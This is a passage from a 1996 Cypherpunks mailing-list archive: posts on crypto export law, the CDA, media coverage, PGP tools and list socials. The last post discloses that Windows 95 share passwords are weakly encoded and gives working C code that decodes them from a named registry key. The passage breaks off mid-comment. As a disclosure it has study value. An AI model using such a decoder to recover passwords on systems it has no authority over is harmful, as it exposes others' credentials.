crypto research to a class where some students happen not to be U.S. citizens.

Of course we all know this already. Just some U.S. people prefer to ignore the
mote in their own eye and to fight censorship in exotic remote developing
countries. Do you remember how U.S. Gov't tried to prevent the publications of
research papers on zero-knowledge proofs?

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 12 Feb 1996 01:26:56 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: YOU SHOULDA BEEN THERE!
Message-ID: <Pine.SUN.3.91.960211081856.892C-100000@crl2.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I easily had 100+ people at my party last night.  Attendees on
this list are invited to share there impressions, but as far as
I could tell it was a resounding success for crypto-anarchy
solidarity.  

There will will be some great pictures on the Web site sometime
this week (http://www.c2.org/party/masquerade.html).  Amond them
will be a picture of Sameer dancing like a madman, Annette Haven,
the movie star I promised you (a legend of X-rated films) and 
your's truly, driving home a point about the CDA during an
discussion with Romana Machado, plus many others.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 11 Feb 1996 23:43:58 +0800
To: cypherpunks@toad.com
Subject: Re: China
In-Reply-To: <199602111021.CAA21482@ix2.ix.netcom.com>
Message-ID: <NcZ5iD2w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Bill Stewart <stewarts@ix.netcom.com> writes:

> At 01:54 PM 2/10/96 EST, you wrote:
> >It's not difficult to imagine that governments will seek to regulate the
> >possession of modems again. Some may recall that in the U.S. it used to be
> >technically illegal to connect a modem to the phone jack without a permissio
> >from AT&T.
>
> Actually, permission from the local phone companies, who owned the system,
> I assume?  (Though I don't actually remember which parts of The Phone Company
> were involved in the Carterphone decision.)

Nope.  I used modems back when the local phone company _was AT&T. :-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 11 Feb 1996 22:41:14 +0800
To: cypherpunks@toad.com
Subject: WIT_nes
Message-ID: <199602111423.JAA23244@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


The NYT Web site does not seem to offer today's Sunday magazine 
article on the federal Witness Security Program, as revealed 
through one family's trauma of official death and rebirth:


WIT_nes  (38k in 2 parts)









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 11 Feb 1996 23:20:58 +0800
To: cypherpunks@toad.com
Subject: Re: Reasons in support of crypto-anarchy WAS Re: Why am I (fwd)
Message-ID: <199602111454.JAA24610@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


It's hard to tell the difference between "Assasination 
Politics" and government-sponsored provocateurism, a 
well-documented practice to stigmatize anarchical and 
anti-authoritarian ventures.


However, it takes guts and thick skin to advocate overthrow of 
authority, knowing that reasonable people will think you're a 
nut seeking celebrity martyrdom.


Happily for the careers of agent-and-anarchist back-stabbing 
back-scratchers, there is no easy way to know for sure which is 
which, or even if there's any difference when the media 
juggernauts are provocateuring both roles for melodramatic 
infotainment.











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Mon, 12 Feb 1996 00:47:05 +0800
To: Alan Pugh <ampugh@mci.newscorp.com>
Subject: Strange Sounds of Silence
In-Reply-To: <199602102305.SAA05611@camus.delphi.com>
Message-ID: <9602111615.AA06435@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Alan Pugh writes:
 > Has anyone else out there noticed the strange sounds of silence
 > emmanating from the american print and broadcast media concerning the
 > rider attached to the Telecommunications Act recently signed by
 > President Clinton known as the CDA (Communications Decency Act)?

I always hear it referred to as "provisions which would ban
pornography on the Internet" or "new laws that prohibit sending
X-rated materials to children on the Internet".

______c_____________________________________________________________________
Mike M Nally * Tiv^H^H^H IBM * Austin TX    * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ed Carp <erc@dal1820.computek.net>
Date: Mon, 12 Feb 1996 00:54:03 +0800
To: "Dr. Dimitri Vulis" <dlv@bwalk.dm.com>
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
In-Reply-To: <41X5iD1w165w@bwalk.dm.com>
Message-ID: <Pine.3.89.9602111003.B11207-0100000@dal1820.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 11 Feb 1996, Dr. Dimitri Vulis wrote:

>  Export means:
> 
>  (4) Disclosing or transferring technical data to a foreign person, whether
>  in the United States or abroad;
> 
> A foreign person is defined in S 120.11, and means anyone who's not a U.S.
> citizen. Technical data is defined in S 120.33

Oh?  You mean that I can get busted for giving my Canadian spouse a copy 
of PGP?
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935 voicemail/digital pager
					800/558-3408 SkyPager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

"Past the wounds of childhood, past the fallen dreams and the broken families,
through the hurt and the loss and the agony only the night ever hears, is a
waiting soul.  Patient, permanent, abundant, it opens its infinite heart and
asks only one thing of you ... 'Remember who it is you really are.'"

                    -- "Losing Your Mind", Karen Alexander and Rick Boyes

The mark of a good conspiracy theory is its untestability.
		    -- Andrew Spring





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Feb 1996 02:40:16 +0800
To: cypherpunks@toad.com
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
Message-ID: <ad436a62470210044ce3@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:01 PM 2/11/96, Dr. Dimitri Vulis wrote:

>As I read it, a college professor might get busted for explaining his own new
>crypto research to a class where some students happen not to be U.S. citizens.

Considering that most engineering and computer science classses are
approaching 50 percent non-U.S.-citizen, and considering that no such
professors have yet been busted, I'm inclined to think this is a
non-threat.

(Indeed, it's a _potential_ threat, and one we should bear in mind, but it
seems likely that no such prosecutions have occurred or will occur.)

What we talk about every day on this list and the non-prosecution of any of
us should be evidence about where the real emphasis is. (The investigation
of Zimmermann and Goen was related to the appearance on foreign shores of a
real chunk of code, PGP 1.0, and not simple communication with aliens.)


>Of course we all know this already. Just some U.S. people prefer to ignore the
>mote in their own eye and to fight censorship in exotic remote developing
>countries. Do you remember how U.S. Gov't tried to prevent the publications of
>research papers on zero-knowledge proofs?

No, could you provide some details? Who was pressured? Micali? Goldwasser?
Rackoff? Please share the details.

There has been an ineffective "voluntary review" process for academic
researchers, and perhaps this is what Dimitri is referring to. But this did
not stop the publication of the ZKIPS work a decade or so ago.

--Tim May

Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David J. Phillips" <djp@pobox.asc.upenn.edu>
Date: Mon, 12 Feb 1996 00:46:40 +0800
To: cypherpunks@toad.com
Subject: cypherpunks, digital cash, and my doctoral research
Message-ID: <9602111614.AA15674@noc4.dccs.upenn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm a PhD student at the Annenberg School for Communication at the
University of Pennsylvania.  My research is on the ways that various groups
influence the development of "digital cash" systems.

I'd like to work with cypherpunks for part of this research.  Right now, I
expect this work to include reviewing the list's archives, participating in
the list and in physical meetings, and interviewing some people.

If you have any thoughts on this (or feelings: revulsion, intrigue, pique
perhaps), please drop me a line.

Thanks.

djp
David J. Phillips, Annenberg School, University of Pennsylvania

I'm researching cultural, economic, legal, and technical aspects of the
development of digital cash systems.  Let me know if you're interested.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 12 Feb 1996 02:45:31 +0800
To: cypherpunks@toad.com
Subject: Selling the Sizzle of Crypto
Message-ID: <ad436d3c48021004f873@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:47 PM 2/11/96, Deranged Mutant wrote:

>I caught the last few seconds of a CNN story on FVs FUD this morning. It
>followed with the RSA selling crypto to China story, where they clearly
>opted for soundbytes... the cut Phil Z's words short when he was talking
>about the benefits of crypto... they asked him something about why crypto
>is good for national security and you hear him say a few economic things
>but then he's cut off (probably before he can mention personal freedom as
>benefitting national security... but that's only a guess).

I'm just about giving up on the "infotainment" media for ever getting the
facts straight. Just not enough time, and they go for the most provocative
statements to make the story "interesting."

Even a longer format such as on the Newshour with Jim Lehrer (formerly the
MacNeil-Lehrer Newshour) can barely get a coherent story on crypto and
cyberspace issues out. If they interview several people, then maybe Mike
Godwin will get 60 seconds, Kathy Cleaver will get 60 seconds, and then
some rebuttal. No way to get the key ideas across.

Ironically, there is some hope. I just got an "academic" paper to review,
and one of the main URLs cited was Steven Levy's "Crypto Rebels" piece (the
URL is http://www.hotwired.com/wired/1.2/features/crypto.rebels.html). I
may be biased about this article, but I still think it to be the best
introductory article on the crypto controversy.

Academics citing popular articles!

Well, Levy's article is a very good, and insightful, exposition of the
issues and the coming battle between the two opposing points of view. (And
it shows that popular-oriented articles need not be solely devoted to
flash, sizzle, and outrageous comments, that ideas can be explored and
positions contrasted.)

Just thought I'd say something positive about journalism.

--Tim May


Boycott espionage-enabled software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 12 Feb 1996 02:32:55 +0800
To: cypherpunks@toad.com
Subject: Re: Regulation of citizen-alien communications (Was: Choices)
Message-ID: <2.2.32.19960211053337.006aff04@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 10:24 AM 02/11/96 +0000, Ed Carp <erc@dal1820.computek.net> wrote:
>On Sun, 11 Feb 1996, Dr. Dimitri Vulis wrote:
>

... deletia ...

>
>Oh?  You mean that I can get busted for giving my Canadian spouse a copy 
>of PGP?
>

Nah - Canada is America's 51st state :-)

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMR1idcVrTvyYOzAZAQFBDgP+MoIrY5OpRnLTBxpvsgTlHbkoEl5yHkYz
JbRr64DV/y0daD5iVI0uSOLDWXHVza+CBdgvZDzI4NF9ShDp3PGheEi/fa5uKD0O
SfkwWAv9vcqNC4fPUCP7A/+eUuVPPSZff8Iy29hnb/JzxHZLyqQiHaOZK7wtNVnw
XZha0gw6LYs=
=6Fh+
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Mon, 12 Feb 1996 02:42:45 +0800
To: cypherpunks@toad.com
Subject: Public Key
Message-ID: <2.2.32.19960211053339.0068a884@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I've gotten a couple of requests for my public key (which is also available via my CDA-violating home page), so thought I'd go ahead and post it here, as well.

My apologies for the loss of bandwidth :-)

Dave Merriman

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi3uZ2MAAAEEALWQtxX77SZSaFls6cVbPp+fZS4MNyKK3ZFYQo0qWyj+0tMq
YgRTPRJRaCQixo63RttknogfPp514qdVMZw5iPeOXmD+RxrmTTwlbGqA7QUiG1x5
LG2Zims5zk4U6/rt8hwLh0/8E4lIb9r5d31qc8L1A9Twk/cmN8VrTvyYOzAZAAUR
tCpEYXZpZCBLLiBNZXJyaW1hbiA8bWVycmltYW5AYXJuZXQuYXJuLm5ldD60KURh
dmlkIEsuIE1lcnJpbWFuIDxtZXJyaW1hbkBtZXRyb25ldC5jb20+iQCVAwUQLqwC
X5IDOImWiDcFAQHFfwP/Tm5v3zoijU9oYmAO1WVsw4+HamN0HdBKkDxPtuGeCmxN
uiDPsucVjqctMfbh1WzCfNEbNfZdg3YVdDNgsQqlu4k8XznrbQSoQm3t5ySQNKvQ
x0KisJnee0caVpEgQ4bwSfuv81TG08lJt4A0fIpXSllMnRkXenvXIBmgJTUklaiJ
AJUDBRAupxG0qWOYkEirxV0BAUUJBACJ0FYXTlR9ncd0tNnYGOGSLO1scgt8IxUD
MyQ2htEsfSNxD6jg303LuAA/Zset5p0JhACLLHbgtZlpYH4uQbjy9Ve9JrVm/6Sy
sSnX1TfSNF5NoMcxGDYgNDRLtP/5jKRZ/hzH8vjHSWXnnN9Pb1MdYdWql4DjDQ+d
IEm5sywbqIkAlQIFEC3uaE3Fa078mDswGQEBbI8D/0FiwDcbfeNyDVJ+7EIWHjIx
VkIGu+ArYUEllR3GSBHVZ9Vh7n8bNXeNHMnG5cZ23TLMVvweyhxFS+cDi+I7omeD
Nr6x65z500LxfUvLK5bSuSiBVkTp2z+/iojY/662JwKHzEEunuJ4CO8Yhxy11Cde
szEX7DpXzRxLL92rEmO2
=nZak
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMR1jecVrTvyYOzAZAQFRJAQAl+yTpIMFJ1hzUzpsIywNu6jHNEe/bTSi
6DXftJPJlHM/6Wjf28z54M0RswZUiS2g4B4Eg5qqTgpWPrk6XtCQzYVF+lDNm9/3
UEGOqIlS4cf3iY40dkHj1S2jN5/WYew1UM0rgL07fObCryaBsXHCe8uHhfDu+VAn
YGEB8L7yglI=
=mevq
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"It is not the function of our Government to keep the citizen
from falling into error; it is the function of the citizen to
keep the Government from falling into error."
Robert H. Jackson (1892-1954), U.S. Judge
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
My web page: http://www.geocities.com/CapitolHill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gimonca@skypoint.com (Charles Gimon)
Date: Mon, 12 Feb 1996 02:35:45 +0800
To: cypherpunks@toad.com
Subject: ...OR IF NOT, you shoulda been here.
Message-ID: <m0tlfgE-0005MRC@skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain



While people in the Bay Area were taking part in Naked Jello Wrestling
and other dubious pursuits, the best 'n the brightest of Minnesota 
were pestering the waitstaff at an Applebee's franchise overlooking
frozen Lake Calhoun in Minneapolis, where yet another good time
(though maybe not as spicy a time) was had by all. If you want to
know more, you'll have to ask: we didn't have a hot tub, so none
of us expect a book deal anytime soon.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Mon, 12 Feb 1996 01:20:31 +0800
To: cypherpunks@toad.com
Subject: Re: PGP & Seamless Pegasus
Message-ID: <199602111642.LAA15731@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

JNPGP also has problems when you're encrypting to an address that isn't 
on the keyring.  It'll barf and send the plaintext message out.  A really 
bad flaw.

It'd be nice to see it or another utility incorporate support for 
anonymous remailers, etc.

IMO, all this will be made much easier when PGP 3.0 exists as a Windows 
or OS/2 DLL.  PGP will probably take off beautifully then.

Rob.

Tripp Hardy wrote:
> 
> Let's not celebrate just yet.  While it is a great improvement, it still =
> causes errors if you try to encrypt an attached file and conventional =
> encryption still doesn't work here.  The only one that is working all =
> around for me is Private Idaho.  We are moving in right direction =
> though.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR4cbCoZzwIn1bdtAQGi0wF/X9JB0tJU5H0JNf141u+F7Zf1uDNSUnXx
H6STdM5urkwtWvvZCxM9v0lt03D+ro7r
=CSSL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Mon, 12 Feb 1996 01:23:22 +0800
To: cypherpunks@toad.com
Subject: Re: Media: FV story makes ClariNet
Message-ID: <199602111647.LAA15759@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I caught the last few seconds of a CNN story on FVs FUD this morning. It 
followed with the RSA selling crypto to China story, where they clearly 
opted for soundbytes... the cut Phil Z's words short when he was talking 
about the benefits of crypto... they asked him something about why crypto 
is good for national security and you hear him say a few economic things 
but then he's cut off (probably before he can mention personal freedom as 
benefitting national security... but that's only a guess).


Joseph M. Reagle Jr. wrote:
> 
> >SAN DIEGO, CALIFORNIA, U.S.A., 1996 FEB 7 (NB) -- First Virtual Holdings,
> >a company offering an Internet commerce system, has demonstrated a
> >program which, it says, makes all existing software systems that
> >encrypt credit card numbers and transmit them over the Internet
> >vulnerable to security breaches.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR4dqCoZzwIn1bdtAQGZjgGAgg71SCvlia7qcZ0aGGhURlsr3jLx9SDr
vezyWWts8apZ2QFVWw9rIuWPC5t9wMrr
=CRFm
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Mon, 12 Feb 1996 01:31:33 +0800
To: cypherpunks@toad.com
Subject: Re: Encryption and Backups
Message-ID: <199602111650.LAA15770@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

GNU-Zip (GZip) format has encryption defined, but (AFAIK) not yet 
implemented.  The probably won't use the vile PKZip method... and they 
probably will implement an unpatented method, if ever.

Mark C. Henderson wrote:
 > GNU tar is not the commercial backup solution many folks will be
> looking for, but it works, and has nice built-in hooks which are
> intended to call a compression program.
> 
> One can also use these options to call an encryption program, as long
> as the encryption program takes stdin as input, stdout as output,
> encrypts by default, and decrypts when given the -d option.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR4ebyoZzwIn1bdtAQE9gwF/cDRa2Ke0i1LoezO68du4VnaR9oQmrRdS
qzAQ4mM3zNsiYVRDtDrz3yqlWwtUcse3
=DQKs
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Zychik <jzychik@via.net>
Date: Mon, 12 Feb 1996 04:23:04 +0800
To: cypherpunks@toad.com
Subject: Re: American Reporter on CDA 2/8/96 (fwd)
Message-ID: <2.2.32.19960211195931.00f83980@via.net>
MIME-Version: 1.0
Content-Type: text/plain


I set the article up with a dark red background and large, yellow lettering
- and posted it on my home page.

Underneath the article is a picture of Lenny Bruce, with the caption

"Lenny Bruce
A better protector of your freedoms than Pat Robertson."


http://www.via.net/~jzychik

Also on my page is a letter from a pot head who e-mailed every congress
person on the net and invited them to arrest him for smoking pot.



jz






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <wlkngowl@unix.asb.com>
Date: Mon, 12 Feb 1996 01:58:10 +0800
To: cypherpunks@toad.com
Subject: Re: V-chips, CC, and Motorcycle Helmets
Message-ID: <199602111709.MAA15846@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

The V-Chip is a political kluge, nothing more. It's a useless technology 
that at best will encourage lax parents to further surrender their kids 
to the neon-nanny.

And besides... why rate program just on violence?  Why not "quality" from 
a variety of orgs?  Other content ratings, from various organizations.  
And why limit it to ratings... why not a special subband of broadcast 
used for sending out schedule updates? Subtitles (in other languages, or 
English for foreign films...)? etc.? etc.? Chances are the V-Chip will 
interfere with any such expansions of TV capabilities in the future...

Then again, the heck with TV. I rarely watch it.  I prefer the radio 
myself... at least they didn't require V-Chips for that.  And with the 
Internet "expanding", chances are in a generation or two TV will be a 
dead technology.

Rob.




Timothy C. May wrote:
> ObCypherpunks: A truly surprising number of people on this list are on the
> one hand lambasting the government for thievery, incompetence, corruption,
> and violation of their rights, while on the other hand explaining why they
> think some particular intrusion is justified. We have people arguing for
> mandatory V-Chips, for Data Privacy Inspection Services, for
> anti-discrimination laws, and for government key signing services.
> 
> It's not a far jump from arguing any of these points to talking about the
> "legitimate" (their term) needs of the government to ensure that encryption
> is not used for criminal purposes, for kidnapping and extortion, for tax
> evasion, etc.
> 
> People need to think about the powerful implications of strong crypto, and
> decide if they are _for_ access to strong crypto by citizens, or _against_
> it. All things follow from this decision.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMR4ixSoZzwIn1bdtAQEEzgGAnj773pwYGJvLo3FYE7JnZ+1+sejbdvCc
ymgeXlua8+0KF46o0ylLCHyhAS/IhasI
=jzi4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Date: Mon, 12 Feb 1996 02:49:05 +0800
To: cypherpunks@toad.com
Subject: Digital Rights...Management
Message-ID: <Pine.BSD.3.91.960211122502.24396A-100000@ahcbsd1.ovnet.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
  Friend, 
 
 
  You may download a copy of the 118-page report, "Digital Rights 
  Management Technologies," prepared for the Committee On New 
  Technologies of the International Federation of Reproduction 
  Rights Organizations at: 
 
                     http://www.ncri.com 
 
 
  Go to page 2 of home page. 
 
  Link to "Articles." 
 
  Go to p 3 of "Articles." 
 
  Voila! 
 
 
  Cordially, 
 
  Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David R." <snakey@wam.umd.edu>
Date: Mon, 12 Feb 1996 02:45:40 +0800
To: cypherpunks@toad.com
Subject: I decrypted Windows 95 share passwords...
Message-ID: <199602111738.MAA15947@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I just posted the following message to a few usenet groups.  I thought
it might be of interest here too.  Note: I know nothing about 
cryptography, and I didn't have to know anything about cryptography
in order to break this pitiful Microsoft 'code'.

David Ross
snakey@cs.umd.edu

Here's the message I posted:

I recently was fiddling around with my Windows 95 registry and decided to
see just how "encrypted" passwords for shared items _really_ are.  Well,
after some experimentation, I was able to break the code!  This was
rather surprising to me, considering I'm just a college student with
absolutely no background in encryption.  I have submitted my findings to
"Hack Microsoft" contest.  =)

The implications of this discovery are not extremely apparent.  It would
seem that anyone with access to your registry would already have access
to anything else on your computer.  Nevertheless, the flawed belief that
an encrypted password stored in your registry is actually encrypted to a
degree expected from a company such as Microsoft could lead to potential
security holes.  At least the fact that Microsoft _attempted_ to 
encrypt these passwords might indicate that they saw some reason
themselves to have them inaccessable.

The included C code (with a description of the Microsoft 'encryption'
included) will decode a password for a shared item from its byte code
in the registry.

David Ross
snakey@cs.umd.edu

Here's the program:

/* This program takes an 'encrypted' Windows 95 share password and decrypts it.
 * Look at:
 * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\LanMan
 * to find a machine's shares.  Within the data for each share are two
 * registry entries, Parm1enc and Parm2enc.  Parm1enc is the "Full access"
 * password.  Parm2enc is the "Read only" password.
 *
 * David Ross  2/9/96
 * snakey@cs.umd.edu
 *
 * Do not distribute this program for any commercial purpose without first
 * contacting me for permission.
 *
 * DO NOT USE THIS PROGRAM FOR ILLEGAL OR UNETHICAL PURPOSES!
 *
 * A technical description of the 'code' can be found later on in this
 * document. 
 *
 * Oh yeah...  a totally unsolicited self promotion here...  If anyone has
 * a job for a junior year Computer Science student for summer '96, please
 * let me know!  I'm familiar with Windows and Mac networking (especially 
 * involving TCP/IP), fluent in C and C++, and working on becoming a
 * proficient Windows programmer.
 *
 */

#include <stdio.h>
#include <string.h>

#define BUFFER 30

int DecodeCharOne(unsigned char *);
int DecodeCharTwo(unsigned char *);
int DecodeCharThree(unsigned char *);
int DecodeCharFour(unsigned char *);
int DecodeCharFive(unsigned char *);
int DecodeCharSix(unsigned char *);
int DecodeCharSeven(unsigned char *);
int DecodeCharEight(unsigned char *);

main() {

  int i;           /* Generic counter */
  int eocc = 0;    /* Records if there has been an error */

  /* The following structure stores the encoded bytes.  Decoded values
   * replace the encoded values as the decoding process moves along
   * The initial values show here are not used and are unimportant
   */
  unsigned char mybytes[] = { 0x15, 0xba, 0x6d, 0x86, 0x73, 0x89, 0xf4, 0x4a };
  unsigned short tempshort;   /* Used as a go-between from sscanf() to
				 mybytes[] so unaligned data accesses
				 don't occur */

  int goupto = 0;  /* Records how many characters there are to be decoded */
  
  /* The following code handles input */
  char inpt[BUFFER];
  char *inptptr;
  
  printf("Input the byte code in hex (ex: 76 d5 09 e3): ");
  fgets(inpt, BUFFER, stdin);
  
  inptptr = strtok(inpt, " ");
  if (inpt[0] != '\n')
    while ((inptptr != NULL) && (goupto < 8)) {
      sscanf(inptptr, "%hx", &tempshort);
      mybytes[goupto++] = tempshort;
      inptptr = strtok(NULL, " ");
    }
  
  /* Decode all the characters.  I could have made this stop immediately
   * after an error has been found, but it really doesn't matter
   */
  if (!DecodeCharOne(&mybytes[0])) eocc = 1;
  if (!DecodeCharTwo(&mybytes[1])) eocc = 1;
  if (!DecodeCharThree(&mybytes[2])) eocc = 1;
  if (!DecodeCharFour(&mybytes[3])) eocc = 1;
  if (!DecodeCharFive(&mybytes[4])) eocc = 1;
  if (!DecodeCharSix(&mybytes[5])) eocc = 1;
  if (!DecodeCharSeven(&mybytes[6])) eocc = 1;
  if (!DecodeCharEight(&mybytes[7])) eocc = 1;

  /* If the password could be decoded, print it */
  if (eocc) printf("The encrypted password is invalid.\n");
  else {
    printf("The decoded password is: \"");
    for (i = 0; i < goupto; i++) printf("%c",mybytes[i]);
    printf("\"\n");
  }
}  /* End of main() */

/*
 * I will document this function, but not the seven other functions
 * which decode the subsequent seven characters.  All of these functions
 * are essentially the same.  Multiple functions are necessary though
 * because each column of the password has a different set of encoding
 * patterns.
 *
 * The following section will attempt to explain the encoding scheme
 * for share passwords as stored in the Windows 95 registry.  I will
 * try to explain this as clearly as I can, however I really have no
 * background in encryption.  If you have any questions, please feel
 * free to send them to me at snakey@cs.umd.edu.
 *
 * First off, share passwords can be anywhere from one character to
 * eight.  "Read only" passwords and "Full access" passwords both use
 * the same encoding scheme, and so they both can be decoded by this
 * program.  There is a one-to-one relationship between the number of
 * characters in a password and the number of bytes in the encoded
 * password stored in the registry.  In fact, each encoded byte directly
 * corresponds to the letter in the corresponding column of the
 * unencoded password!  Ie: If I change a password "passwd" to "masswd",
 * only the first byte of the encrypted password will change.  Knowing
 * this, it is easy to see that all that needs to be done to decode
 * the password is to find a mapping from an encoded byte to a decoded
 * letter.  That's what this program does.  Unfortunately, things get
 * a little tricky because a letter in the first column of a password
 * is encoded using a slightly different algorithm than a letter
 * in the second column, and so on.
 *
 * There is another complexity which we do not really need to worry
 * about to a great extent, but we still need to be aware of.  Many
 * characters, when entered into a password, map to the same encoded
 * byte.  The best example of this is that both 'A' and 'a' are the
 * same as far as share passwords are concerned.  There are numerous
 * other examples of this, and this allows us to effectively limit the
 * range of characters we need to be able to decode.  The range of
 * ASCII values we will have to be able to decode turns out to be
 * from 32 to 159.  ASCII values higher than 159 tend to map to
 * encoded bytes which also represent more normal ASCII values.  So
 * if a user manages to create a password with high ASCII values
 * in it, that password will still be decoded by this program.
 * Although the decoded password won't look the same as the original,
 * it will work just as well.
 *
 * With all of the preliminaries out of the way, I can now move on
 * to describing the mapping from an encoded byte to it's corresponding
 * ASCII value.  I think the best way to describe this would be through
 * a picture of exactly how the characters from 32 to 63 are mapped
 * out in the code for the first letter in a password.  This table goes
 * beyond the 80 column format maintained in the rest of this document,
 * but it is really the best solution.  If the table below doesn't look
